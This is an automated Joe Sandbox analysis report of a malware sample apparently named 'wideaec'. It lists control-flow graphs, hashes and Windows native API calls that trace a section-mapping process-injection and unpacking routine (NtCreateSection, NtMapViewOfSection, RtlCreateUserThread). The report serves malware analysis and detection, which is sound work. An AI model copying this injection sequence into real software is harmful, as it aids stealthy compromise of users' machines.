                                                                                                                                              • Opcode Fuzzy Hash: 8a8c107c90811e6390bac5a4fc857e8bc3aa7e6139d6a18d575a9703efd087d7
                                                                                                                                              • Instruction Fuzzy Hash: 6DA1D571846624ABC720EB61DC45BDF7B78EF4D314F0180AAF609A3161DB385A85CBED

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 155 401514-401533 157 401524-40152f 155->157 158 401536-40156e call 401193 155->158 157->158 167 401570 158->167 168 401573-401578 158->168 167->168 170 401898-4018a0 168->170 171 40157e-40158f 168->171 170->168 174 4018a5-4018b7 170->174 175 401595-4015be 171->175 176 401896 171->176 182 4018c5 174->182 183 4018bc-4018e3 call 401193 174->183 175->176 184 4015c4-4015db NtDuplicateObject 175->184 176->174 182->183 184->176 186 4015e1-401605 NtCreateSection 184->186 189 401661-401687 NtCreateSection 186->189 190 401607-401628 NtMapViewOfSection 186->190 189->176 192 40168d-401691 189->192 190->189 191 40162a-401646 NtMapViewOfSection 190->191 191->189 195 401648-40165e 191->195 192->176 196 401697-4016b8 NtMapViewOfSection 192->196 195->189 196->176 198 4016be-4016da NtMapViewOfSection 196->198 198->176 200 4016e0 call 4016e5 198->200
                                                                                                                                              APIs
                                                                                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.2053804160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_wideaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Section$View$Create$DuplicateObject
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1546783058-0
                                                                                                                                              • Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                                                                                              • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                                                                                                                              • Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                                                                                              • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 202 4014fe-401503 203 401531-40156e call 401193 202->203 204 401506-401511 202->204 214 401570 203->214 215 401573-401578 203->215 214->215 217 401898-4018a0 215->217 218 40157e-40158f 215->218 217->215 221 4018a5-4018b7 217->221 222 401595-4015be 218->222 223 401896 218->223 229 4018c5 221->229 230 4018bc-4018e3 call 401193 221->230 222->223 231 4015c4-4015db NtDuplicateObject 222->231 223->221 229->230 231->223 233 4015e1-401605 NtCreateSection 231->233 236 401661-401687 NtCreateSection 233->236 237 401607-401628 NtMapViewOfSection 233->237 236->223 239 40168d-401691 236->239 237->236 238 40162a-401646 NtMapViewOfSection 237->238 238->236 242 401648-40165e 238->242 239->223 243 401697-4016b8 NtMapViewOfSection 239->243 242->236 243->223 245 4016be-4016da NtMapViewOfSection 243->245 245->223 247 4016e0 call 4016e5 245->247
                                                                                                                                              APIs
                                                                                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.2053804160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_wideaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Section$CreateDuplicateObjectView
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1652636561-0
                                                                                                                                              • Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                                                                                              • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                                                                                                                              • Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                                                                                              • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 249 401542-40156e call 401193 258 401570 249->258 259 401573-401578 249->259 258->259 261 401898-4018a0 259->261 262 40157e-40158f 259->262 261->259 265 4018a5-4018b7 261->265 266 401595-4015be 262->266 267 401896 262->267 273 4018c5 265->273 274 4018bc-4018e3 call 401193 265->274 266->267 275 4015c4-4015db NtDuplicateObject 266->275 267->265 273->274 275->267 277 4015e1-401605 NtCreateSection 275->277 280 401661-401687 NtCreateSection 277->280 281 401607-401628 NtMapViewOfSection 277->281 280->267 283 40168d-401691 280->283 281->280 282 40162a-401646 NtMapViewOfSection 281->282 282->280 286 401648-40165e 282->286 283->267 287 401697-4016b8 NtMapViewOfSection 283->287 286->280 287->267 289 4016be-4016da NtMapViewOfSection 287->289 289->267 291 4016e0 call 4016e5 289->291
                                                                                                                                              APIs
                                                                                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.2053804160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_wideaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Section$View$Create$DuplicateObject
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1546783058-0
                                                                                                                                              • Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                                                                                              • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                                                                                                                              • Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                                                                                              • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 293 401549-40156e call 401193 297 401570 293->297 298 401573-401578 293->298 297->298 300 401898-4018a0 298->300 301 40157e-40158f 298->301 300->298 304 4018a5-4018b7 300->304 305 401595-4015be 301->305 306 401896 301->306 312 4018c5 304->312 313 4018bc-4018e3 call 401193 304->313 305->306 314 4015c4-4015db NtDuplicateObject 305->314 306->304 312->313 314->306 316 4015e1-401605 NtCreateSection 314->316 319 401661-401687 NtCreateSection 316->319 320 401607-401628 NtMapViewOfSection 316->320 319->306 322 40168d-401691 319->322 320->319 321 40162a-401646 NtMapViewOfSection 320->321 321->319 325 401648-40165e 321->325 322->306 326 401697-4016b8 NtMapViewOfSection 322->326 325->319 326->306 328 4016be-4016da NtMapViewOfSection 326->328 328->306 330 4016e0 call 4016e5 328->330
                                                                                                                                              APIs
                                                                                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.2053804160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_wideaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Section$View$Create$DuplicateObject
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1546783058-0
                                                                                                                                              • Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                                                                                              • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                                                                                                                              • Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                                                                                              • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 332 401557 333 40155b-40156e call 401193 332->333 334 40154f-401554 332->334 337 401570 333->337 338 401573-401578 333->338 334->333 337->338 340 401898-4018a0 338->340 341 40157e-40158f 338->341 340->338 344 4018a5-4018b7 340->344 345 401595-4015be 341->345 346 401896 341->346 352 4018c5 344->352 353 4018bc-4018e3 call 401193 344->353 345->346 354 4015c4-4015db NtDuplicateObject 345->354 346->344 352->353 354->346 356 4015e1-401605 NtCreateSection 354->356 359 401661-401687 NtCreateSection 356->359 360 401607-401628 NtMapViewOfSection 356->360 359->346 362 40168d-401691 359->362 360->359 361 40162a-401646 NtMapViewOfSection 360->361 361->359 365 401648-40165e 361->365 362->346 366 401697-4016b8 NtMapViewOfSection 362->366 365->359 366->346 368 4016be-4016da NtMapViewOfSection 366->368 368->346 370 4016e0 call 4016e5 368->370
                                                                                                                                              APIs
                                                                                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.2053804160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_wideaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Section$View$Create$DuplicateObject
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1546783058-0
                                                                                                                                              • Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                                                                                              • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                                                                                                                              • Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                                                                                              • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 402 402f97-402fbb 403 402fc1-402fd9 402->403 404 4030ee-4030f3 402->404 403->404 405 402fdf-402ff0 403->405 406 402ff2-402ffb 405->406 407 403000-40300e 406->407 407->407 408 403010-403017 407->408 409 403039-403040 408->409 410 403019-403038 408->410 411 403062-403065 409->411 412 403042-403061 409->412 410->409 413 403067-40306a 411->413 414 40306e 411->414 412->411 413->414 415 40306c 413->415 414->406 416 403070-403075 414->416 415->416 416->404 417 403077-40307a 416->417 417->404 418 40307c-4030eb RtlCreateUserThread NtTerminateProcess 417->418 418->404
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.2053804160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_wideaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateProcessTerminateThreadUser
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1921587553-0
                                                                                                                                              • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                                                                              • Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
                                                                                                                                              • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                                                                              • Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 70 63003c-630047 71 630049 70->71 72 63004c-630263 call 630a3f call 630e0f call 630d90 VirtualAlloc 70->72 71->72 87 630265-630289 call 630a69 72->87 88 63028b-630292 72->88 93 6302ce-6303c2 VirtualProtect call 630cce call 630ce7 87->93 90 6302a1-6302b0 88->90 92 6302b2-6302cc 90->92 90->93 92->90 99 6303d1-6303e0 93->99 100 6303e2-630437 call 630ce7 99->100 101 630439-6304b8 VirtualFree 99->101 100->99 102 6305f4-6305fe 101->102 103 6304be-6304cd 101->103 106 630604-63060d 102->106 107 63077f-630789 102->107 105 6304d3-6304dd 103->105 105->102 110 6304e3-630505 105->110 106->107 113 630613-630637 106->113 111 6307a6-6307b0 107->111 112 63078b-6307a3 107->112 121 630517-630520 110->121 122 630507-630515 110->122 114 6307b6-6307cb 111->114 115 63086e-6308be LoadLibraryA 111->115 112->111 116 63063e-630648 113->116 118 6307d2-6307d5 114->118 120 6308c7-6308f9 115->120 116->107 119 63064e-63065a 116->119 123 6307d7-6307e0 118->123 124 630824-630833 118->124 119->107 125 630660-63066a 119->125 126 630902-63091d 120->126 127 6308fb-630901 120->127 128 630526-630547 121->128 122->128 129 6307e2 123->129 130 6307e4-630822 123->130 132 630839-63083c 124->132 131 63067a-630689 125->131 127->126 133 63054d-630550 128->133 129->124 130->118 134 630750-63077a 131->134 135 63068f-6306b2 131->135 132->115 136 63083e-630847 132->136 138 6305e0-6305ef 133->138 139 630556-63056b 133->139 134->116 140 6306b4-6306ed 135->140 141 6306ef-6306fc 135->141 142 63084b-63086c 136->142 143 630849 136->143 138->105 146 63056f-63057a 139->146 147 63056d 139->147 140->141 144 63074b 141->144 145 6306fe-630748 141->145 142->132 143->115 144->131 145->144 150 63059b-6305bb 146->150 151 63057c-630599 146->151 147->138 154 6305bd-6305db 150->154 151->154 154->133
                                                                                                                                              APIs
                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0063024D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.2053936482.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_630000_wideaec.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                              • String ID: cess$kernel32.dll
                                                                                                                                              • API String ID: 4275171209-1230238691
                                                                                                                                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                              • Instruction ID: 8f69342a498a25bf33f9362e99804d6d805f6cc08e10f7a952bbbdd345a8224a
                                                                                                                                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                              • Instruction Fuzzy Hash: AF527874A00229DFDB64CF58C995BA8BBB1BF09314F1480D9E90DAB351DB30AE89DF54

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 372 416ae6-416aed 373 416af0-416b00 372->373 374 416b02 373->374 375 416b08-416b0b 373->375 374->375 375->373 376 416b0d-416b2e LoadLibraryW call 4164d0 call 416720 375->376 381 416b30-416b37 376->381 382 416b39-416b47 MoveFileA 381->382 383 416b4d-416b53 381->383 382->383 384 416b55 call 4164c0 383->384 385 416b5a-416b61 383->385 384->385 388 416b70-416b77 385->388 389 416b63-416b6a InterlockedDecrement 385->389 388->381 390 416b79-416b89 388->390 389->388 391 416b90-416ba0 390->391 393 416ba2 391->393 394 416ba9-416bac 391->394 393->394 394->391 395 416bae-416bb9 394->395 396 416bc0-416bc5 395->396 397 416bc7-416bcd 396->397 398 416bcf-416bd5 396->398 397->398 399 416bd7-416be4 397->399 398->396 398->399
                                                                                                                                              APIs
                                                                                                                                              • LoadLibraryW.KERNELBASE(00418374), ref: 00416B12
                                                                                                                                              • MoveFileA.KERNEL32(00000000,00000000), ref: 00416B47
                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 00416B6A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.2053825637.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_40b000_wideaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DecrementFileInterlockedLibraryLoadMove
                                                                                                                                              • String ID: k`$}$
                                                                                                                                              • API String ID: 418655872-956986773
                                                                                                                                              • Opcode ID: 43f99f8ac428f16e081c033c36405718f082dd07f42b23fb4eed68b588b4d0ee
                                                                                                                                              • Instruction ID: 42061d5068bdce50c1bf5091c343343de5c0ff0e781990f509a1e5bc66fdcea5
                                                                                                                                              • Opcode Fuzzy Hash: 43f99f8ac428f16e081c033c36405718f082dd07f42b23fb4eed68b588b4d0ee
                                                                                                                                              • Instruction Fuzzy Hash: AB2126349882208BCB20DB60DC457DABB60FB48319F1244BFEA49D7290CA38ADC4C79D

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 401 4164d0-416610 GetModuleHandleW GetProcAddress VirtualProtect
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleW.KERNEL32(00511CE8), ref: 004165AF
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,0041C210), ref: 004165EC
                                                                                                                                              • VirtualProtect.KERNELBASE(00511B2C,00511CE4,00000040,?), ref: 0041660B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.2053825637.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_40b000_wideaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2099061454-3916222277
                                                                                                                                              • Opcode ID: ed8495ad91114ca58db7b4743c9787d6e3477e2d90cf241a67db01d1f531d50d
                                                                                                                                              • Instruction ID: 5d6b8529abac6a2ef6dc9a1a277ef6d20b5afcabe6b96dcf33e4d09f3920d241
                                                                                                                                              • Opcode Fuzzy Hash: ed8495ad91114ca58db7b4743c9787d6e3477e2d90cf241a67db01d1f531d50d
                                                                                                                                              • Instruction Fuzzy Hash: 00310310AD8781CBE301CBE8FC447813A62AB35748F04C0E89648873B5D7BE5A58D7AE

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 419 7108e3-7108fc 420 7108fe-710900 419->420 421 710902 420->421 422 710907-710913 CreateToolhelp32Snapshot 420->422 421->422 423 710923-710930 Module32First 422->423 424 710915-71091b 422->424 425 710932-710933 call 7105a2 423->425 426 710939-710941 423->426 424->423 430 71091d-710921 424->430 431 710938 425->431 430->420 430->423 431->426
                                                                                                                                              APIs
                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0071090B
                                                                                                                                              • Module32First.KERNEL32(00000000,00000224), ref: 0071092B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.2054076985.000000000070D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_70d000_wideaec.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3833638111-0
                                                                                                                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                              • Instruction ID: c7b0d681e4a82b50acb239e41765b5d62651ddeacb34ecb7d7ad7fb1b2930157
                                                                                                                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                              • Instruction Fuzzy Hash: B3F06235500715AFE7202ABD989DBAE76ECAF59724F104528E642910C1DAB8E8C54AA1

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 432 630e0f-630e24 SetErrorMode * 2 433 630e26 432->433 434 630e2b-630e2c 432->434 433->434
                                                                                                                                              APIs
                                                                                                                                              • SetErrorMode.KERNELBASE(00000400,?,?,00630223,?,?), ref: 00630E19
                                                                                                                                              • SetErrorMode.KERNELBASE(00000000,?,?,00630223,?,?), ref: 00630E1E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.2053936482.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_630000_wideaec.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorMode
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2340568224-0
                                                                                                                                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                              • Instruction ID: 4b3f2dadeb50f47f9dffb3410bc12ca49dcb814039e7263dfb2ecc5297b295b0
                                                                                                                                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                              • Instruction Fuzzy Hash: 9ED0123124512877D7003A94DC09BCD7B1CDF05B62F008411FB0DD9180C770994046E5

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 435 4018e6-40194b call 401193 Sleep call 40141f 449 40195a-4019a5 call 401193 435->449 450 40194d-401955 call 401514 435->450 450->449
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.2053804160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_wideaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1885482327-0
                                                                                                                                              • Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                                                                                              • Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
                                                                                                                                              • Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                                                                                              • Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 464 401915-401918 465 4018c6-4018c7 464->465 466 40191a-40194b call 401193 Sleep call 40141f 464->466 468 4018d7 465->468 469 4018ce-4018e3 call 401193 465->469 478 40195a-4019a5 call 401193 466->478 479 40194d-401955 call 401514 466->479 468->469 479->478
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.2053804160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_wideaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1885482327-0
                                                                                                                                              • Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                                                                                              • Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
                                                                                                                                              • Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                                                                                              • Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
